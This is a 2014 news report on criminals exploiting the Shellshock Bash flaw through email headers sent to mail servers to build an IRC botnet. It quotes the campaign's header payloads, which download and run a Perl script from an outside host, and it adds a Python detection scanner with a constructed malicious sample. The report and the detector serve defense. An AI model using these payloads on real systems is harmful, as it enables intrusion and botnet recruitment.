
Report: Criminals use Shellshock against mail servers to build botnet

Steve Ragan | Oct. 28, 2014
Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

When it was disclosed in September, Shellshock — the common name given to a vulnerability in Bash that enables command execution — impacted systems both large and small, creating ripples across the tech industry.

Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.

It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.

How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.

On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded from IRC.

Subsequent investigation by CSO led to the discovery of one of the IRC servers used to host the bots. As of October 24, more than 160 compromised hosts were connected to this server.

THE MESSAGE:

The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.

The person(s) behind the spam blasts place the following code in several message fields, including the "To:", "From:", "Subject:", "Date:" and "Message-ID:" headers, among others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

A full list of the fields, with examples, is available here.
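As an added example (not code from the article or from the campaign), the following Python scanner flags mail headers that carry the Bash function-definition token the campaign abuses; the sample message, its header values and the placeholder host on a TEST-NET address are all constructed here.

```python
import re
from email import message_from_string

# Shellshock (CVE-2014-6271 family) trigger: a Bash function definition
# "() { ... }" followed by a ';' and trailing commands. The campaign above
# places this in ordinary header fields, so any header value containing
# the token is worth flagging; legitimate headers never look like this.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def find_shellshock_headers(raw_message: str):
    """Return [(header_name, value)] for every header matching the token."""
    msg = message_from_string(raw_message)
    hits = []
    for name, value in msg.items():  # preserves header order
        if SHELLSHOCK_RE.search(str(value)):
            hits.append((name, str(value)))
    return hits


# Constructed sample (not the campaign's real message): two poisoned
# headers in the style described above, plus benign headers. The host
# 203.0.113.7 is a documentation address and the URL scheme is defanged.
SAMPLE = (
    "From: () { :; };wget -O /tmp/.x hxxp://203.0.113.7/x.txt;perl /tmp/.x\n"
    "To: ops@example.invalid\n"
    "Subject: weekly report\n"
    "Message-ID: () { :; };/bin/true\n"
    "Date: Fri, 24 Oct 2014 10:00:00 +0000\n"
    "\n"
    "\n"
)

if __name__ == "__main__":
    for header, value in find_shellshock_headers(SAMPLE):
        print(f"suspicious header {header}: {value}")
```

Run it against a raw message captured from a mail log or quarantine; an MTA-side filter can drop or quarantine a message on the first hit.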

A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.

THE SERVER:

The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing on network integration and information security.
